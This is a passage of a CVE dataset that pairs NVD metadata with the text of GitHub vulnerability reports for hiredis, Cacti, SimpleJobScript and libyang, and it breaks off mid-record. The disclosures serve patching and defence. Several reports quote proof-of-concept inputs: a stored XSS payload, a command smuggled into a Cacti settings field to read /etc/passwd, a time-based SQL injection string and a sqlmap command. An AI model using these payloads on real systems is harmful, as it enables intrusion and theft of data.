[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redislabs:hiredis:*:*:*:*:*:*:*:*", "matchCriteriaId": "485B9377-2288-48C5-9B4F-2DF0DB0E2C44", "versionEndExcluding": null, "versionEndIncluding": "0.14.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/redis/hiredis/issues/747
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "redis", "hiredis" ]
The following code never aborts when `malloc` is unsuccessful, causing dereferencing of null pointers. async.c:61 ```C redisCallback *dup = malloc(sizeof(*dup)); memcpy(dup,src,sizeof(*dup)); // dup may be null return dup; ``` dict.c:75 ```C dict *ht = malloc(sizeof(*ht)); _dictInit(ht,type,privDataPtr); // ht may be null ``` dict.c:146 ```C entry = malloc(sizeof(*entry)); entry->next = ht->table[index]; // entry may be null ``` dict.c:261 ```C dictIterator *iter = malloc(sizeof(*iter)); iter->ht = ht; // iter may be null ```
Null pointer dereferencing in dict.c and async.c
https://api.github.com/repos/redis/hiredis/issues/747/comments
6
2020-01-09T21:34:41Z
2020-01-22T18:59:34Z
https://github.com/redis/hiredis/issues/747
547,736,563
747
1,016
CVE-2020-7106
2020-01-16T04:15:11.697
Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php, graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and user_group_admin.php, as demonstrated by the description parameter in data_sources.php (a raw string from the database that is displayed by $header to trigger the XSS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00032.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3191" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00014.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00038.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SUSOTOIEJKD2IWJHN7TY56TDZJQZJUVJ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XLZAMGTW2OSIBLYLXWHQBGWP7M4DTRS7/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00032.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3191" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00014.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/03/msg00038.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SUSOTOIEJKD2IWJHN7TY56TDZJQZJUVJ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XLZAMGTW2OSIBLYLXWHQBGWP7M4DTRS7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202003-40" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB72E0C8-BC84-4F75-A844-9D9D41031118", "versionEndExcluding": "1.2.9", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:suse:package_hub:-:*:*:*:*:*:*:*", "matchCriteriaId": "284A8DA0-317B-4BBE-AECB-7E91BBF0DD3B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:suse:linux_enterprise:12.0:*:*:*:*:*:*:*", "matchCriteriaId": "CBC8B78D-1131-4F21-919D-8AC79A410FB9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "3D9C7598-4BB4-442A-86DF-EEDE041A4CC7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "BB176AC3-3CDA-4DDA-9089-C67B2F73AA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:fedoraproject:extra_packages_for_enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "3C30C1AC-01E4-4D7C-B03A-8EEEF3FC8C2F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Cacti/cacti/issues/3191
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** Data source input validation error leads to Stored XSS within Description after creating a device with Malicious code embedded in Description field. **To Reproduce** Steps to reproduce the behavior: 1. Navigate to Console -> Create -> New Device 2. In Description field, input script payload: `<svg/onload=alert(1)>` 3. Fill out the rest of the form as normal 4. Click Save. After the first click, there will be an error dialog saying Whitelisting is ON (yes, I turned it on this time). However, I was still able to save the "New Device" form by clicking "Save" once again. 5. After the message of "Successfully operated", click on "Data Sources" on the top right menu. XSS dialog will pop up. You might ask me questions about CSP and the whitelisting thing in config.php: If I turned the whitelisting feature ON? **YES** If I fixed html.php to append CSP policy? **YES** **Screenshots** - Input fields: https://imgur.com/GcAyUkC - Pop XSS dialog: https://imgur.com/VkMIgs2 - CSP Enabled: https://imgur.com/4A0v3jq - XSS string was not filtered in data_sources.php: https://imgur.com/xRFHXAP
Lack of escaping on some pages can lead to XSS exposure (CVE-2020-7106)
https://api.github.com/repos/Cacti/cacti/issues/3191/comments
21
2020-01-15T19:15:24Z
2020-06-30T12:34:01Z
https://github.com/Cacti/cacti/issues/3191
550,377,486
3,191
1,017
CVE-2020-7237
2020-01-20T05:15:11.687
Cacti 1.2.8 allows Remote Code Execution (by privileged users) via shell metacharacters in the Performance Boost Debug Log field of poller_automation.php. OS commands are executed when a new poller cycle begins. The attacker must be authenticated, and must have access to modify the Performance Settings of the product.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "COMPLETE", "baseScore": 9, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://ctrsec.io/index.php/2020/01/25/cve-2020-7237-remote-code-execution-in-cacti-rrdtool/" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3201" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SUSOTOIEJKD2IWJHN7TY56TDZJQZJUVJ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XLZAMGTW2OSIBLYLXWHQBGWP7M4DTRS7/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202003-40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://ctrsec.io/index.php/2020/01/25/cve-2020-7237-remote-code-execution-in-cacti-rrdtool/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3201" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SUSOTOIEJKD2IWJHN7TY56TDZJQZJUVJ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XLZAMGTW2OSIBLYLXWHQBGWP7M4DTRS7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202003-40" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*", "matchCriteriaId": "2D05824B-4E66-44CA-A862-0DDDB23C8C88", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/Cacti/cacti/issues/3201
[ "Exploit", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** An input validation error found in Boost Debug Log field leads to Remote Code Execution. **To Reproduce** Steps to reproduce the behavior: 1. Navigate to Console -> Configuration -> Settings -> Performance 2. In Boost Debug Log field, type in the payload: `--verbose; cat /etc/passwd > rce.txt` 3. Save. Even the $input_whitelisting in config.php is ON, it would still accept this payload. 4. Wait a little bit until new polling cycle gets fetched. Navigate to `http://cacti/rce.txt` to see /etc/passwd content. **Screenshots** - Payload ![image](https://user-images.githubusercontent.com/21222141/72675679-95e61c80-3a4d-11ea-927f-9702f9002ccc.png) - Successfully saved the payload ![image](https://user-images.githubusercontent.com/21222141/72675705-f7a68680-3a4d-11ea-98f2-d48cd2ef8d16.png) - /etc/passwd content ![image](https://user-images.githubusercontent.com/21222141/72675717-0d1bb080-3a4e-11ea-9e46-6d04d3d283b9.png) **Root cause** - Not like other fields in Configuration tab, Boost Debug Log would still be saved even if the input contains special characters. - Tracing back to server log, I observed that this is being handled by poller_automation.php where it gets fetched by the poller process. - Taking a look at the poller_automation.php, I observed that there are 5 different arguments that can be used to passed into its command. Hence, we can use either --debug, --force, --verbose, --version, or --help to pass into Boost Debug Log field. - After crafting a payload, the script will look like: `/bin/php <path>/poller_automation.php --verbose; cat /etc/passswd > rce.txt` where it gets fetched by the new poller process and create rce.txt in webroot. **Remediation** - Apply a check on this field (i.e: input length, input characters) - If this field is supposed to take these mentioned arguments, create a drop-down menu instead of string field if possible. Please let me know if you need any further information. Chi Tran
Remote Code Execution due to input validation failure in Performance Boost Debug Log (CVE-2020-7237)
https://api.github.com/repos/Cacti/cacti/issues/3201/comments
2
2020-01-19T06:04:29Z
2020-06-30T12:34:01Z
https://github.com/Cacti/cacti/issues/3201
551,872,554
3,201
1,018
CVE-2020-7229
2020-01-21T17:15:12.863
An issue was discovered in Simplejobscript.com SJS before 1.65. There is unauthenticated SQL injection via the search engine. The parameter is landing_location. The function is countSearchedJobs(). The file is _lib/class.Job.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/7" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory", "URL Repurposed" ], "url": "https://simplejobscript.com" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/niteosoft/simplejobscript/issues/7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory", "URL Repurposed" ], "url": "https://simplejobscript.com" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:simplejobscript:simplejobscript:*:*:*:*:*:*:*:*", "matchCriteriaId": "BB5C84B9-3990-499E-ACFF-1E8F990A4691", "versionEndExcluding": "1.65", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/niteosoft/simplejobscript/issues/7
[ "Third Party Advisory" ]
github.com
[ "niteosoft", "simplejobscript" ]
**Description:** An issue was discovered in Simplejobscript.com SJS before 1.65. There is unauthenticated SQL injection via the search engine. The parameter is `landing_location`. The function is `countSearchedJobs()`. The file is `_lib/class.Job.php`. **Environment:** - Version: 1.64 - OS: Ubuntu 16.10 - Web server: Apache 2.4.18 - PHP: 5.6.40 - Database: MySQL 5.7.28 - URL: /searched **Payload:** `landing_title=aaa&landing_location=77+or+(select+(sleep(2)))` **Steps to Reproduce:** `$ sqlmap --threads=10 --batch --dbms=mysql -u "http://local.simplejobscript.net/searched" --data="landing_title=aaa&landing_location=77" -p landing_location --banner` **PoC:** ![sjs-sqli-search](https://user-images.githubusercontent.com/5347721/72162034-7e5dc280-33c1-11ea-9da9-26e492bb234a.png)
[security] CVE-2020-7229, SQL injection in search function
https://api.github.com/repos/niteosoft/simplejobscript/issues/7/comments
5
2020-01-10T14:55:41Z
2020-01-19T11:12:18Z
https://github.com/niteosoft/simplejobscript/issues/7
548,124,219
7
1,019
CVE-2019-17357
2020-01-21T19:15:13.067
Cacti through 1.2.7 is affected by a graphs.php?template_id= SQL injection vulnerability affecting how template identifiers are handled when a string and id composite value are used to identify the template type and id. An authenticated attacker can exploit this to extract data from the database, or an unauthenticated remote attacker could exploit this via Cross-Site Request Forgery.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947374" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3025" }, { "source": "cve@mitre.org", "tags": null, "url": "https://security.gentoo.org/glsa/202003-40" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "https://www.darkmatter.ae/xen1thlabs/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00005.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=947374" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3025" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.gentoo.org/glsa/202003-40" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://www.darkmatter.ae/xen1thlabs/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:*:*:*:*:*:*:*:*", "matchCriteriaId": "A4F5AE29-35EB-4B0E-8304-F5520AAE998B", "versionEndExcluding": null, "versionEndIncluding": "1.2.7", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/Cacti/cacti/issues/3025
[ "Patch", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** As reported by Eldar Marcussen of xen1thLabs there is a SQL injection vulnerability in Cacti's graphs.php. **Expected behavior** Cacti should be not contain SQL vunderabilities
When viewing graphs, some input variables are not properly checked (SQL injection possible)
https://api.github.com/repos/Cacti/cacti/issues/3025/comments
4
2019-10-12T19:46:24Z
2020-06-30T12:49:01Z
https://github.com/Cacti/cacti/issues/3025
506,229,820
3,025
1,020
CVE-2019-20391
2020-01-22T22:15:10.080
An invalid memory access flaw is present in libyang before v1.0-r3 in the function resolve_feature_value() when an if-feature statement is used inside a bit. Applications that use libyang to parse untrusted input yang files may crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793934" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/bdb596ddc07596fa212f231135b87d0b9178f6f8" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/issues/772" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00019.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1793934" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/commit/bdb596ddc07596fa212f231135b87d0b9178f6f8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/CESNET/libyang/compare/v1.0-r2...v1.0-r3" }, { "source": 